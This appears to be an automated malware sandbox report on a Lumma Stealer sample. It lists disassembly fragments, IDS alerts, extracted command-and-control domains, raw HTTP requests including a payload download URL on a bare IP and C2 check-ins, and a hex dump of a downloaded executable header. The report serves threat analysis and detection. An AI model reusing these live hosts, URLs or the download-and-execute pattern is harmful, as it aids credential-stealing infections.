                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024BC6C3
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_024BB763
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024BB763
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then jmp eax3_2_024B6739
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]3_2_024A87DF
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]3_2_024A77E9
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then jmp ecx3_2_024CC79B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov edx, eax3_2_024B7797
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]3_2_024B54D1
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ebx, edi3_2_024AD4D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]3_2_024A554C
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]3_2_024A6544
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h3_2_024CD557
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, word ptr [eax]3_2_024CD557
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_024AC528
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h3_2_024B552B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h3_2_024B559D
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h3_2_024B55B3
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_0249DA09
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_0249DA09
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]3_2_0249EAA2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]3_2_0249CB7E
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_024B5BF7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ecx, di3_2_024B5BF7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0249ABA7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov edx, ecx3_2_0249ABA7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_024BB75E
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024BB75E
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024A4806
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h3_2_024B0817
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_024C3897
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_024BC8B1
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_024BC94B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]3_2_02499967
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]3_2_02499967
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]3_2_02499967
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_024A6907
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov eax, edx3_2_024AC921
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]3_2_024B89C0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]3_2_024CA9DE
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_024BC98D
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_024BC99C
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ebp, dword ptr [eax]3_2_024C6E67
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov word ptr [eax], dx3_2_024A5F79
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024B1F77
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov word ptr [ebx], dx3_2_024A8F35
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov word ptr [ebx], cx3_2_024A8F35
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h3_2_024CCFC7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]3_2_0249DF8C
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi]3_2_024CBC08
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_024B9C17
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]3_2_024AEC17
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh3_2_024C6C3B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov esi, eax3_2_024B3C9B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024CAD19
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h3_2_024CCD87

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.6:63859 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.6:64353 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.6:49752 -> 104.21.22.222:443
                  Source: Network trafficSuricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.6:54461 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.6:51288 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.6:49759 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.6:56428 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.6:52796 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.6:64555 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.6:49493 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.6:62214 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49752 -> 104.21.22.222:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49752 -> 104.21.22.222:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49759 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49759 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49768 -> 23.55.153.106:443
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: effecterectz.xyz
                  Source: Malware configuration extractorURLs: immureprech.biz
                  Source: Malware configuration extractorURLs: deafeninggeh.biz
                  Source: Malware configuration extractorURLs: debonairnukk.xyz
                  Source: Malware configuration extractorURLs: wrathful-jammy.cyou
                  Source: Malware configuration extractorURLs: awake-weaves.cyou
                  Source: Malware configuration extractorURLs: sordid-snaked.cyou
                  Source: Malware configuration extractorURLs: diffuculttan.xyz
                  Performs DNS queries to domains with low reputation
                  Source: DNS query: effecterectz.xyz
                  Source: DNS query: diffuculttan.xyz
                  Source: DNS query: debonairnukk.xyz
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Dec 2024 13:16:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 14 Dec 2024 13:15:01 GMTETag: "58600-6293abc281063"Accept-Ranges: bytesContent-Length: 361984Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 17 cd 9e a9 53 ac f0 fa 53 ac f0 fa 53 ac f0 fa ee e3 66 fa 52 ac f0 fa 4d fe 74 fa 4d ac f0 fa 4d fe 65 fa 47 ac f0 fa 4d fe 73 fa 3d ac f0 fa 74 6a 8b fa 5a ac f0 fa 53 ac f1 fa 20 ac f0 fa 4d fe 7a fa 52 ac f0 fa 4d fe 64 fa 52 ac f0 fa 4d fe 61 fa 52 ac f0 fa 52 69 63 68 53 ac f0 fa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e7 de 32 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f8 03 00 00 0e 3f 00 00 00 00 00 5c 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 43 00 00 04 00 00 9e c3 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 29 04 00 50 00 00 00 00 10 42 00 30 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c f6 03 00 00 10 00 00 00 f8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4c 22 00 00 00 10 04 00 00 24 00 00 00 fc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c c4 3d 00 00 40 04 00 00 70 00 00 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 f4 00 00 00 10 42 00 00 f6 00 00 00 90 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                  Source: Joe Sandbox ViewIP Address: 104.21.22.222 104.21.22.222
                  Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                  Source: Joe Sandbox ViewIP Address: 104.21.56.70 104.21.56.70
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49726 -> 176.113.115.19:80
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49752 -> 104.21.22.222:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49768 -> 23.55.153.106:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49759 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49722 -> 104.21.56.70:443
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deafeninggeh.biz
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004029F4
                  Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
                  Source: 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                  Source: global trafficDNS traffic detected: DNS query: post-to-me.com
                  Source: global trafficDNS traffic detected: DNS query: sordid-snaked.cyou
                  Source: global trafficDNS traffic detected: DNS query: immureprech.biz
                  Source: global trafficDNS traffic detected: DNS query: deafeninggeh.biz
                  Source: global trafficDNS traffic detected: DNS query: effecterectz.xyz
                  Source: global trafficDNS traffic detected: DNS query: diffuculttan.xyz
                  Source: global trafficDNS traffic detected: DNS query: debonairnukk.xyz
                  Source: global trafficDNS traffic detected: DNS query: wrathful-jammy.cyou
                  Source: global trafficDNS traffic detected: DNS query: awake-weaves.cyou
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                  Source: rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/
                  Source: rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000002.4623211072.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000002.4623107198.0000000000A36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
                  Source: rHrG691f7q.exe, 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
                  Source: rHrG691f7q.exe, 00000000.00000003.4485117055.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000002.4623211072.0000000000AA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeM
                  Source: rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeT
                  Source: rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exef
                  Source: rHrG691f7q.exe, 00000000.00000003.4485117055.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000002.4623211072.0000000000AA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exef3
                  Source: rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exel
                  Source: rHrG691f7q.exe, 00000000.00000003.4485117055.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000002.4623211072.0000000000AA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeo3
                  Source: rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exet3
                  Source: rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeu
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
